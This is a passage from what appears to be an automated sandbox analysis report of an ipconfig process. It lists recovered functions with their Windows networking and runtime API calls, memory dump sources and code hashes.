                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00F6214C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClassesDhcpEnumLocal$AllocConvertFreeInterfaceLuidName
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3187720636-0
                                                                                                                              • Opcode ID: 92ac91d1b84e591a684abd4eb3c5e8753c51ba35caebc26030ca892a48896cc4
                                                                                                                              • Instruction ID: 313a48e87af2a1bb2feb26869d12580d85eabfe89789f33d2830b1ec908c2187
                                                                                                                              • Opcode Fuzzy Hash: 92ac91d1b84e591a684abd4eb3c5e8753c51ba35caebc26030ca892a48896cc4
                                                                                                                              • Instruction Fuzzy Hash: 79419472E04708AFEB10AFE4DD85BAEB779FF54710F140025FA05AB281DAB5AC44A790
                                                                                                                              Function 00F64634 Relevance: 7.6, APIs: 5, Instructions: 78threadmemoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentThreadCompartmentId.IPHLPAPI ref: 00F64641
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              • NsiAllocateAndGetTable.NSI(00000001,00F61350,00000007,?,00000004,?,00000668,00000000,00000000,00000000,00000000,?,00000001), ref: 00F6468B
                                                                                                                              • SetCurrentThreadCompartmentId.IPHLPAPI(?), ref: 00F646A7
                                                                                                                              • SetCurrentThreadCompartmentId.IPHLPAPI(00000000), ref: 00F646DF
                                                                                                                              • NsiFreeTable.NSI(?,?,00000000,00000000), ref: 00F646ED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CompartmentCurrentThread$FreeTable$AllocateFormatLocalMessage__iob_func
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4019950967-0
                                                                                                                              • Opcode ID: 357e52198467b3d47f04bd7b78137996547d36b317489023757f7df3d807eeb8
                                                                                                                              • Instruction ID: 4f0bec3ccf36f5fa070e2190879933b8e427e122323950742c59c5ba1e69ab56
                                                                                                                              • Opcode Fuzzy Hash: 357e52198467b3d47f04bd7b78137996547d36b317489023757f7df3d807eeb8
                                                                                                                              • Instruction Fuzzy Hash: 1711BB31A00218FFD71077E5DC0AE9FBF69EF41B54F000054F515AB091D7B69904E7A1
                                                                                                                              Function 00F63096 Relevance: 7.6, APIs: 5, Instructions: 61timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00F630B1
                                                                                                                              • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?), ref: 00F630BF
                                                                                                                              • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000400,00000002,?,00000000,?,00000080,?,?), ref: 00F630D9
                                                                                                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000080,?,?), ref: 00F630E5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Time$File$DateErrorFormatLastLocalSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1951311907-0
                                                                                                                              • Opcode ID: 376c4f87dcfd2540db1d0638a221b1e71598e92706af5e24f8ca6673c27c2383
                                                                                                                              • Instruction ID: 53d5a27d785edb07591f8eee8e10b0713b50f9d7107dfb7f03c8be3467b8f098
                                                                                                                              • Opcode Fuzzy Hash: 376c4f87dcfd2540db1d0638a221b1e71598e92706af5e24f8ca6673c27c2383
                                                                                                                              • Instruction Fuzzy Hash: F411A572A04209BFEB249B659C0AFFF7BBCEF45754F000026F602E6180DBB099499670
                                                                                                                              Function 00F65615 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00F65642
                                                                                                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00F65651
                                                                                                                              • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00F6565A
                                                                                                                              • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00F65663
                                                                                                                              • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00F65678
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1445889803-0
                                                                                                                              • Opcode ID: 7f5968469ebf989c06a761a683ac07c39601ab25d4581d7ca9f4441a2094c26c
                                                                                                                              • Instruction ID: e25d347dace44399bf815227f328f7b5d8096c96893328d18dec7403dafd9bbb
                                                                                                                              • Opcode Fuzzy Hash: 7f5968469ebf989c06a761a683ac07c39601ab25d4581d7ca9f4441a2094c26c
                                                                                                                              • Instruction Fuzzy Hash: F111E871D05209EFCB10DBB8DA4869EB7F5FF58715FA14866D412E7214EB709A00EB50
                                                                                                                              Function 0388F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038D02E7
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038D02BD
                                                                                                                              • RTL: Re-Waiting, xrefs: 038D031E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: e14fa9da6b2ea9601e249db35255f7836c233317092b6ccc3dd80285515943d4
                                                                                                                              • Instruction ID: 839ef7c0d03dbbf5a57d500c900779690ef476ae3739f8b7fe471a8e27d9a8b0
                                                                                                                              • Opcode Fuzzy Hash: e14fa9da6b2ea9601e249db35255f7836c233317092b6ccc3dd80285515943d4
                                                                                                                              • Instruction Fuzzy Hash: B7E1CF706087419FE725EFA8D884B2AB7E0BF84318F180A9DF6A5CB2D1D774D845CB52
                                                                                                                              Function 0389BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Resource at %p, xrefs: 038D7B8E
                                                                                                                              • RTL: Re-Waiting, xrefs: 038D7BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 038D7B7F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              • Opcode ID: 4e6e44a9f6eb9d50070e77e581079eff31909a84cccef51d44202517bab876aa
                                                                                                                              • Instruction ID: e89e793a42a6e14596ffe32fa649fc0c001aef79e975fa7a620834790566b741
                                                                                                                              • Opcode Fuzzy Hash: 4e6e44a9f6eb9d50070e77e581079eff31909a84cccef51d44202517bab876aa
                                                                                                                              • Instruction Fuzzy Hash: 4D4137353007069FEB21DEA8D840B2AB7E5EF84710F080A9EF956DB780D731E801CB91
                                                                                                                              Function 0389B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038D728C
                                                                                                                              Strings
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 038D7294
                                                                                                                              • RTL: Resource at %p, xrefs: 038D72A3
                                                                                                                              • RTL: Re-Waiting, xrefs: 038D72C1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: 122a3839b448dcc198da6e24427b5258ee46556029824283309a97dc22c8d29b
                                                                                                                              • Instruction ID: c50dbe6514c0e1e2033594be89b9da1e8745122bcd396ff70b862f32e0dd4a40
                                                                                                                              • Opcode Fuzzy Hash: 122a3839b448dcc198da6e24427b5258ee46556029824283309a97dc22c8d29b
                                                                                                                              • Instruction Fuzzy Hash: 0C412335700386ABDB21DEA8CC41B6AB7A5FF85714F180699F956EB240DB21F842C7D1
                                                                                                                              Function 03912300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: 5c2e414ef92731f12770bfe3f894d874a7c9e11d12fa81697af6ffdfd1c100f4
                                                                                                                              • Instruction ID: 1645ada7b01d191185623d97b1b1e7fcab43910cc1360014a1b275bac28c9515
                                                                                                                              • Opcode Fuzzy Hash: 5c2e414ef92731f12770bfe3f894d874a7c9e11d12fa81697af6ffdfd1c100f4
                                                                                                                              • Instruction Fuzzy Hash: 6D318476A0021D9FDB20DF69CC40BEFB7BCEB44650F440995E889E7240EB30AA558BA1
                                                                                                                              Function 00F62B49 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00F62B76
                                                                                                                              • ConvertGuidToStringW.IPHLPAPI(?,?,00000027), ref: 00F62B8D
                                                                                                                                • Part of subcall function 00F62C01: memset.MSVCRT ref: 00F62C2B
                                                                                                                                • Part of subcall function 00F62C01: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00F62C80
                                                                                                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,Dhcpv6ClassId,00000000,?,?,00000200,00000001,?), ref: 00F62BCE
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ConvertGuid$FormatFreeInterfaceLocalLuidMessageOpenQueryStringValue__iob_funcmemset
                                                                                                                              • String ID: Dhcpv6ClassId
                                                                                                                              • API String ID: 2135874933-1235502083
                                                                                                                              • Opcode ID: c7c320badc813aa6a610d508f4b3d80320a395b1527a0bb8fa35931424497509
                                                                                                                              • Instruction ID: 13fb3d5b17d1f6e93bf0fdb55f5f22ccf3eeed8a547fdb6f0a39d1c1674e8117
                                                                                                                              • Opcode Fuzzy Hash: c7c320badc813aa6a610d508f4b3d80320a395b1527a0bb8fa35931424497509
                                                                                                                              • Instruction Fuzzy Hash: 72112E71A0460CAADB50EBA0CC4DFEA73BCEB54704F4041A5E509E7090EBB5AA44AB54
                                                                                                                              Function 00F621A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ConvertInterfaceLuidToGuid.IPHLPAPI(?,?), ref: 00F621D5
                                                                                                                              • ConvertGuidToStringW.IPHLPAPI(?,?,00000027), ref: 00F621EC
                                                                                                                                • Part of subcall function 00F62260: memset.MSVCRT ref: 00F6228A
                                                                                                                                • Part of subcall function 00F62260: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00F622DF
                                                                                                                              • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DhcpClassId,00000000,?,?,00000200,00000001,?), ref: 00F6222D
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ConvertGuid$FormatFreeInterfaceLocalLuidMessageOpenQueryStringValue__iob_funcmemset
                                                                                                                              • String ID: DhcpClassId
                                                                                                                              • API String ID: 2135874933-3964061114
                                                                                                                              • Opcode ID: 8044460f5a5553f1fe721bff076e9b3960e0e82b3e518bc04e1c89f9a6c24c9f
                                                                                                                              • Instruction ID: d7c12f1c5cb84ce2c6555f1a4bdc24344d28963ceb67212a5521fc6d5385af28
                                                                                                                              • Opcode Fuzzy Hash: 8044460f5a5553f1fe721bff076e9b3960e0e82b3e518bc04e1c89f9a6c24c9f
                                                                                                                              • Instruction Fuzzy Hash: DB11517190460CABEB50EFA0CC4DFDA73BCAB44704F0001A5E509E6090EB759A48AF50
                                                                                                                              Function 00F61D1D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(dhcpcsvc.dll,00000000,00000000,00F62577,00000001), ref: 00F61D26
                                                                                                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,DhcpIsEnabled), ref: 00F61D3B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                              • String ID: DhcpIsEnabled$dhcpcsvc.dll
                                                                                                                              • API String ID: 2574300362-2583171064
                                                                                                                              • Opcode ID: 513843476516bcb9a4bde776dec3cbd5435503c35167b8ef677996e46d03f1c2
                                                                                                                              • Instruction ID: 39fdd7b257fa116c0277f32877ed439eb136f6cc85f859427bc2ffd1c44bbb50
                                                                                                                              • Opcode Fuzzy Hash: 513843476516bcb9a4bde776dec3cbd5435503c35167b8ef677996e46d03f1c2
                                                                                                                              • Instruction Fuzzy Hash: A1D09E74644706B6DB102B715C1BB5636A47B11B81F580455E821DA7D1EBF5D000FA32
                                                                                                                              Function 00F62749 Relevance: 6.1, APIs: 4, Instructions: 117COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ConvertInterfaceLuidToNameW.IPHLPAPI(?,00000002,00000020), ref: 00F627D1
                                                                                                                              • NsiSetAllParameters.NSI(00000001,00000005,00F61368,00000019,?,00000008,00000000,00000000), ref: 00F627ED
                                                                                                                              • Dhcpv6IsEnabled.DHCPCSVC6(00000002,?), ref: 00F62801
                                                                                                                              • Dhcpv6AcquireParameters.DHCPCSVC6(00000002), ref: 00F62817
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Dhcpv6Parameters$AcquireConvertEnabledFormatFreeInterfaceLocalLuidMessageName__iob_func
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1181060623-0
                                                                                                                              • Opcode ID: ea243d40d7d78f7b154debd9c25bef2b895d003670c387da0b57dc87a9ccc30b
                                                                                                                              • Instruction ID: eae0c1ec2019443b9c20d4d4d1494088fde86cfb4f29ed27566b926b2d653f8b
                                                                                                                              • Opcode Fuzzy Hash: ea243d40d7d78f7b154debd9c25bef2b895d003670c387da0b57dc87a9ccc30b
                                                                                                                              • Instruction Fuzzy Hash: 9131EC31E40B08AFDB61DBB58C85AAFB3B9FF54720F14001AE952A7291DBB4EC05B750
                                                                                                                              Function 00F64EC0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00F65478: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00F6547F
                                                                                                                              • __set_app_type.MSVCRT ref: 00F64ED2
                                                                                                                              • __p__fmode.MSVCRT ref: 00F64EE8
                                                                                                                              • __p__commode.MSVCRT ref: 00F64EF6
                                                                                                                              • __setusermatherr.MSVCRT ref: 00F64F17
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1632413811-0
                                                                                                                              • Opcode ID: 4cd3ad99bc448b2c8c45323b88318fbf7165e3cc08d250b4fc58530acbe37a88
                                                                                                                              • Instruction ID: db4d73739848f4af2ee3472b681e893e6058b63542f00c329424b09f180a0786
                                                                                                                              • Opcode Fuzzy Hash: 4cd3ad99bc448b2c8c45323b88318fbf7165e3cc08d250b4fc58530acbe37a88
                                                                                                                              • Instruction Fuzzy Hash: 9FF0ACB05087089FD714BF70EC5A6183B70B746B26F10465AE475D63F1DFBA9480FA10
                                                                                                                              Function 038A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction ID: fa486182bd620e0096d8accd4e76c2fe85d0db188e416b682e07463daa3ec64b
                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction Fuzzy Hash: 4A91A770E00A199BFF24DFDDC8806BEB7A5AF44720F18459AF965E72C4E7708A40D761
                                                                                                                              Function 03869126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: aa900a1ada2428272a5a300aeed29fcf809ed606449d0121831cce1115bf6736
                                                                                                                              • Instruction ID: 7b4218671e1397a1f3e53e2703fa1f8071d0257c4f1039c49685972bc292b695
                                                                                                                              • Opcode Fuzzy Hash: aa900a1ada2428272a5a300aeed29fcf809ed606449d0121831cce1115bf6736
                                                                                                                              • Instruction Fuzzy Hash: D7812875D002699BDB21DB94CC44BEEB7B8AF48710F0445EAE919F7280E7309E84CFA1
                                                                                                                              Function 038ECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 038ECFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4Qw@4Qw
                                                                                                                              • API String ID: 4062629308-2383119779
                                                                                                                              • Opcode ID: 3e7dcca7e0d73719e097cebb63bd68908c99d6731e8f5a152a5a39749bde5dd0
                                                                                                                              • Instruction ID: 3d5467b0845edf5c97790dd5b96120eccae54d4970b1fae6e7a563919e37d167
                                                                                                                              • Opcode Fuzzy Hash: 3e7dcca7e0d73719e097cebb63bd68908c99d6731e8f5a152a5a39749bde5dd0
                                                                                                                              • Instruction Fuzzy Hash: 10417B759003189FCB21DFE9C840AADBBB8FF45B00F0845AAE914DF254D770D949CB62
                                                                                                                              Function 00F62260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
